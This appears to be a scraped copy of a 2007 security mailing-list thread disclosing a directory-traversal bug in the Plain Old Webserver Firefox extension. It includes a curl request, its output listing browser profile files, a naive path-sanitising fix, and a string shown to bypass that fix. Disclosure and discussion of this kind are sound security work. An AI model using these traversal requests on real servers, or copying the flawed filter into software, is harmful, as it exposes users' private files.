Tag: Security, Security / Home

Security

NAVIGATION
CATEGORIES
REFERRENCE
LINKS
Home » Security

  • Plain Old Webserver - The coolest firefoxextension

    5 answers - 83 bytes - related search similar search Add To My Delicious Add To My Stumble Upon Add To My Google Mark Add To My Facebook Add To My Digg Add To My Reddit


    Must have Firefox Extension that allows you to do all sorts of crazy stuff.

  • No.1 | | 1493 bytes | |

    Plain Web Server
    Good Dir Traversal

    curl "127.0.0.1:6670/////" -kivvv
    * About to connect() to 127.0.0.1 port 6670
    * Trying 127.0.0.1 connected
    * Connected to 127.0.0.1 (127.0.0.1) port 6670
    GET ///// HTTP/1.1
    User-Agent: HackTheHacker(tm)
    Host: 127.0.0.1:6670
    Accept: */*

    < HTTP/1.1 200 K
    HTTP/1.1 200 K
    < Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT;
    path=/;
    Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; path=/;
    < Content-Type: text/html
    Content-Type: text/html
    < pow_server: PW/0.0.7
    pow_server: PW/0.0.7
    < Content-Location: /////
    Content-Location: /////
    < Content-Length: 280
    Content-Length: 280

    <br><br><br><br>
    <a href='/////firefox/'>firefox/</a><br>
    <a href='/////bookmarks.html'>bookmarks.html</a><br>
    <a href='/////appreg'>appreg</a><br>
    <a href='/////default/'>default/</a><br>
    <a href='/////pluginreg.dat'>pluginreg.dat</a><br>
    * Connection #0 to host 127.0.0.1 left intact
    * Closing connection #0

    A new motto is on the way:
    HackTheHacker (ascii (tm))

    :)

    Cheers,
    Stefano

    Il giorno ven, 09/02/2007 alle 16.23 +0000, pdp (architect) ha scritto:

    Must have Firefox Extension that allows you to do all sorts of crazy stuff.

  • No.2 | | 509 bytes | |

    pdp (architect) wrote:
    hei man, this is not a news :)

    hehe, the maintainer should update the changelog with
    this feature then :-)

    i suggest this fix for the directory traversal bug

    path = str_replace('/', '', path);

    regards,
    Francesco 'ascii'
    http://www.ush.it/

    /.//.//.//./
    how can't you love funsec?

    Full-Disclosure - We believe in it.
    Charter:
    Hosted and sponsored by Secunia - http://secunia.com/

  • No.3 | | 1608 bytes | |

    hei man, this is not a news :)

    2/9/07, Stefano Di Paola <stefano.dipaola (AT) wisec (DOT) itwrote:
    Plain Web Server
    Good Dir Traversal

    curl "127.0.0.1:6670/////" -kivvv
    * About to connect() to 127.0.0.1 port 6670
    * Trying 127.0.0.1 connected
    * Connected to 127.0.0.1 (127.0.0.1) port 6670
    GET ///// HTTP/1.1
    User-Agent: HackTheHacker(tm)
    Host: 127.0.0.1:6670
    Accept: */*

    < HTTP/1.1 200 K
    HTTP/1.1 200 K
    < Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT;
    path=/;
    Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; path=/;
    < Content-Type: text/html
    Content-Type: text/html
    < pow_server: PW/0.0.7
    pow_server: PW/0.0.7
    < Content-Location: /////
    Content-Location: /////
    < Content-Length: 280
    Content-Length: 280

    <br><br><br><br>
    <a href='/////firefox/'>firefox/</a><br>
    <a href='/////bookmarks.html'>bookmarks.html</a><br>
    <a href='/////appreg'>appreg</a><br>
    <a href='/////default/'>default/</a><br>
    <a href='/////pluginreg.dat'>pluginreg.dat</a><br>
    * Connection #0 to host 127.0.0.1 left intact
    * Closing connection #0
    --
    A new motto is on the way:
    HackTheHacker (ascii (tm))

    :)

    Cheers,
    Stefano

    Il giorno ven, 09/02/2007 alle 16.23 +0000, pdp (architect) ha scritto:

    Must have Firefox Extension that allows you to do all sorts of crazy stuff.

  • No.4 | | 339 bytes | |

    I thing that there is an implicit joke in the previous post

    "/.//.//.//./"
    how can't you love funsec?

    path = str_replace('/', '', path);

    Becomes "////" again

    GF

    Full-Disclosure - We believe in it.
    Charter:
    Hosted and sponsored by Secunia - http://secunia.com/

  • No.5 | | 690 bytes | |

    Stefano Di Paola wrote:
    Plain Web Server
    Good Dir Traversal

    curl "127.0.0.1:6670/////" -kivvv
    * About to connect() to 127.0.0.1 port 6670
    * Trying 127.0.0.1 connected
    * Connected to 127.0.0.1 (127.0.0.1) port 6670
    >GET ///// HTTP/1.1

    Yep, I think it's just a rite of passage for all web servers.

    Matthew Flaschen

    Full-Disclosure - We believe in it.
    Charter:
    Hosted and sponsored by Secunia - http://secunia.com/
    PGP SIGNATURE
    Version: GnuPG v1.4.2.2 (GNU/Linux)
    Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

    cNBMSsUYUTISZI4TLamHH9I=
    =MmTj
    PGP SIGNATURE

Re: Plain Old Webserver - The coolest firefoxextension


max 4000 letters.
Your nickname that display:
In order to stop the spam: 8 + 7 =
QUESTION ON "Security"

EMSDN.COM